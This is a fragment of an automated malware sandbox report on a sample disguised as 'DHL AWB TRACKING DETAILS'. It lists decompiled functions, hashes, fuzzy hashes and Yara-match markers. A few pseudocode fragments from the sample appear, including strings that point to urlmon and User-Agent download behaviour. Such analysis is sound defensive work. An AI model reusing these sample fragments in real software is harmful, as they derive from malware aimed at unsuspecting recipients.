                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 5da292a0d5175d40019c5be78652b0ec1f293971360d8095734f728da332dbab
                    • Instruction ID: 6b4d7e0425104e70e1cf0281e98c6dc005ad9588c8383b12dc07df25e9c88929
                    • Opcode Fuzzy Hash: 5da292a0d5175d40019c5be78652b0ec1f293971360d8095734f728da332dbab
                    • Instruction Fuzzy Hash: EFE04FB1200204BBDB20DF45CC84EE73769EF88354F118555F90D57241C635E9518BB5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6A6 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                    Download Yara Rule
                    C-Code - Quality: 30%
                    			E0041A6A6(int _a4, signed int _a705239657) {
				intOrPtr _v0;
				void* _v117;
				void* _t17;
				signed int _t22;

				asm("pushad");
				_push(ss);
				asm("cmpsd");
				_t22 = _a705239657 * 0x55;
				asm("sbb cl, [ecx]");
				_push(_t22);
				_t10 = _v0;
				E0041AF60(_t17, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t10 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}







                    0x0041a6a6
                    0x0041a6a8
                    0x0041a6a9
                    0x0041a6aa
                    0x0041a6ad
                    0x0041a6b0
                    0x0041a6b3
                    0x0041a6ca
                    0x0041a6d8

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 1a5a23dff515f3b00f93632bade69299f268e3639161ccb4c6f184e7b3169e5f
                    • Instruction ID: d0171bd44801b8c7579054756c7f0b102eb56eb248aa86418a43fde69a5024cf
                    • Opcode Fuzzy Hash: 1a5a23dff515f3b00f93632bade69299f268e3639161ccb4c6f184e7b3169e5f
                    • Instruction Fuzzy Hash: BAE086716003087FC721DF55CC86FCB7B78DF08794F158068B9185B282D570EA11CAD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                    0x0041a6b3
                    0x0041a6ca
                    0x0041a6d8

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                    • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                    • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                    • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 004172DE Relevance: 6.4, Strings: 5, Instructions: 100COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Us$: $er-A$gent$urlmon.dll
                    • API String ID: 0-1367105278
                    • Opcode ID: a678c963038246e85425396d4d9fae11693f00108ab9445269e152e0b43b235c
                    • Instruction ID: ae3ae92166d13a4669f854ef42473618d3d9be1928cb280aa057f48eec424d0a
                    • Opcode Fuzzy Hash: a678c963038246e85425396d4d9fae11693f00108ab9445269e152e0b43b235c
                    • Instruction Fuzzy Hash: 413149B2D042599BDB11CF95CC42BFEBB75EF15704F04009AEC047B241E63A5A42D7EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004172A0 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0151eaff83fc1f5eb6fc01b9003d80741488347930cc37e1604ed5d34acdeca1
                    • Instruction ID: f916b7ad2994dd4bf8e50d2bd3298db53fe7cf3dca30923321e5bfab20524d2c
                    • Opcode Fuzzy Hash: 0151eaff83fc1f5eb6fc01b9003d80741488347930cc37e1604ed5d34acdeca1
                    • Instruction Fuzzy Hash: C5019C628293808BEB228F15D5421F5BB70EF6626075C06DACCE15B543E22295A7C38A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A498A0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                    • Instruction ID: 46278940e38c78cc032eded5860e3122ad04eb904f6cfedb6947099d73470fa8
                    • Opcode Fuzzy Hash: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                    • Instruction Fuzzy Hash: 0690026130100403D213616944146060009E7D1386F91C022E5414555D86758997F172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49820 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                    • Instruction ID: ceb868cc9e9df72b09cb739356477f8b24d0a15ff353318d04c7ca4381bcd75d
                    • Opcode Fuzzy Hash: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                    • Instruction Fuzzy Hash: 1690027124100403D252716944046060009F7D0382F91C022A4414554E86A58A9AFAA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4B040 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                    • Instruction ID: ebd74727f9968b65acdb243d83b3c118fa4e5621fef973a144f97fa76ef665c3
                    • Opcode Fuzzy Hash: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                    • Instruction Fuzzy Hash: 709002A1601140434651B16948044065015F7E1342391C131A4444560C86B88899E2A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A499D0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                    • Instruction ID: c951432fe5c4058c153db097a039c966a56ed862fb3ac2b22d6b3806fec45679
                    • Opcode Fuzzy Hash: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                    • Instruction Fuzzy Hash: 069002A121100043D215616944047060045E7E1342F51C022A6144554CC5798CA5A165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49950 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                    • Instruction ID: d2085487a3ec68fd569bb16c1c296a41458a7b96445308001ec600eac6f1d6fb
                    • Opcode Fuzzy Hash: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                    • Instruction Fuzzy Hash: 5D9002A120140403D251656948046070005E7D0343F51C021A6054555E8A798C95B175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49A80 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                    • Instruction ID: fb4873722bc49e1438366c2fb09a5e83f317e2261090460bcff93e7900d04fa4
                    • Opcode Fuzzy Hash: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                    • Instruction Fuzzy Hash: F890026120144443D25162694804B0F4105E7E1343F91C029A8146554CC9658899A761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49A10 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                    • Instruction ID: 78729c7e456cedafee4e02f6214a96a7b87f8a13df7603f43e31fac003ec9e52
                    • Opcode Fuzzy Hash: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                    • Instruction Fuzzy Hash: 1C90027120140403D211616948087470005E7D0343F51C021A9154555E86B5C8D5B571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4A3B0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                    • Instruction ID: 95c9fdbf52c786c238a7e98c2b2474a4f2ecf9d10e13456b8023b5e74b8376e0
                    • Opcode Fuzzy Hash: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                    • Instruction Fuzzy Hash: AF90027120144003D2517169844460B5005F7E0342F51C421E4415554C8665889AE261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49B00 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                    • Instruction ID: 7e059550ac9cd0fe813c07f0b143804b59d5fcd75d57b298bf6bf8d73168e75d
                    • Opcode Fuzzy Hash: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                    • Instruction Fuzzy Hash: A990026124100803D251716984147070006E7D0742F51C021A4014554D866689A9B6F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A495F0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                    • Instruction ID: 0ec7667788d7ba64c09a9b01173b1ecc9dc5ca75eb6eaf9018ff1c73f168dbfa
                    • Opcode Fuzzy Hash: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                    • Instruction Fuzzy Hash: 7290027120100803D215616948046860005E7D0342F51C021AA014655E96B588D5B171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                    • Instruction ID: a5fc4bb1b518889bab89f84e1e612e2986941a9bf6f034595627cb4dda520619
                    • Opcode Fuzzy Hash: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                    • Instruction Fuzzy Hash: 939002E1201140934611A2698404B0A4505E7E0342B51C026E5044560CC5758895E175
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4AD30 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                    • Instruction ID: 819c523eb183b4270fa0ef3f8ecf62aa0718669270f079081d06a66eda950cd4
                    • Opcode Fuzzy Hash: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                    • Instruction Fuzzy Hash: DD900271A05000139251716948146464006F7E0782B55C021A4504554C89A48A99A3E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49560 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                    • Instruction ID: b2cf2bad8de600511bb8e3ac2253120b3fc335cf9e0d9c4fc996e297be029935
                    • Opcode Fuzzy Hash: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                    • Instruction Fuzzy Hash: DF900265221000030256A569060450B0445F7D6392391C025F5406590CC67188A9A361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A496D0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                    • Instruction ID: 7f3b55cccd44b96df3ce2e803f6e84d46b45ed45473b8a6ecc22e5199adade46
                    • Opcode Fuzzy Hash: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                    • Instruction Fuzzy Hash: 9090027120100843D21161694404B460005E7E0342F51C026A4114654D8665C895B561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49610 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                    • Instruction ID: 1969d06d9d3496e0f36f492f63f6003c2adf6d4670c5dcff35c34a0a6a726f3d
                    • Opcode Fuzzy Hash: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                    • Instruction Fuzzy Hash: 7090027160500803D261716944147460005E7D0342F51C021A4014654D87A58A99B6E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49650 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                    • Instruction ID: d5485bb833f81c9cb29c7298f09912094db676a13c1e03907dd6982adbd80b7f
                    • Opcode Fuzzy Hash: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                    • Instruction Fuzzy Hash: EF90027120504843D25171694404A460015E7D0346F51C021A4054694D96758D99F6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49FE0 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                    • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                    • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                    • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49730 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                    • Instruction ID: 3bb52d245a4a8d8dbd2cfaf84f9634c5d87ddb40de0fa01db3ffdb3c1fd08539
                    • Opcode Fuzzy Hash: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                    • Instruction Fuzzy Hash: 2A90026160500403D251716954187060015E7D0342F51D021A4014554DC6A98A99B6E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4A710 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                    • Instruction ID: 4fed43aec20f879d244a96891f56089b9742b5fac8a2010aa7fc697f92818bd6
                    • Opcode Fuzzy Hash: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                    • Instruction Fuzzy Hash: DD900271301000539611A6A95804A4A4105E7F0342B51D025A8004554C85A488A5A161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49760 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                    • Instruction ID: 2bef6749e95e4eaffd5fe54a56269f45dc9e290a63a5e92e668d9b25185b4e65
                    • Opcode Fuzzy Hash: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                    • Instruction Fuzzy Hash: 4890027120100403D211616955087070005E7D0342F51D421A4414558DD6A68895B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49770 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                    • Instruction ID: cfa6111913af4efd17efcc308eb0b62b0b27411b4b67914e2aff7d76574cc08f
                    • Opcode Fuzzy Hash: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                    • Instruction Fuzzy Hash: 7D90026120504443D21165695408A060005E7D0346F51D021A5054595DC6758895F171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A4A770 Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                    • Instruction ID: d898b98534a8e8d0f13f5fe338b2acc67927a7cc9c71be38e8b090d90dc345a7
                    • Opcode Fuzzy Hash: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                    • Instruction Fuzzy Hash: 8290027520504443D61165695804A870005E7D0346F51D421A441459CD86A488A5F161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: d3e26ec99b546ce764cf27ec5fccbbd13b2b246e5416ca2ae4aab3feb16d02bd
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A9FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x00a9fdda
                    0x00a9fde2
                    0x00a9fde5
                    0x00a9fdec
                    0x00a9fdfa
                    0x00a9fdff
                    0x00a9fe0a
                    0x00a9fe0f
                    0x00a9fe17
                    0x00a9fe1e
                    0x00a9fe19
                    0x00a9fe19
                    0x00a9fe19
                    0x00a9fe20
                    0x00a9fe21
                    0x00a9fe22
                    0x00a9fe25
                    0x00a9fe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                    Strings
